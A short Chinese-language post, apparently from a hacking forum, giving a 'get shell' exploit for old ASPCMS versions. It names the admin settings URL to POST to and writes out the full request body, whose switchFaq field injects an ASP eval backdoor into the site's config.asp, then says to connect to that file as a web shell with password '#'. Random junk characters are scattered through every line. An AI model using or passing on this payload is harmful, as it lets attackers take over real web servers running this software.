老的ASPCMS版本的秒杀拿SHELL漏洞0 {; z) @! j2 y6 z( ^$ Y8 R
- v9 K- A' l2 g2 E C0 d5 `
找到后台。。。然后( F) H1 R. }8 A/ O' w1 L! ?
$ n/ T$ [) w( O- t/admin/_system/AspCms_SiteSetting.asp?action=saves% X, R& M8 }/ X8 H% m2 A3 U
/ Y" q2 z T7 S直接POST; T; ~( C$ B$ l( r/ x
2 V2 F5 B: }6 {. Q6 ?1 j
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
5 z1 C+ I0 I" B% T! U
1 q" a' G. e/ y再连接配置文件config.asp 密码为#
q: [0 \& i% P4 w3 n- ?* I' Q |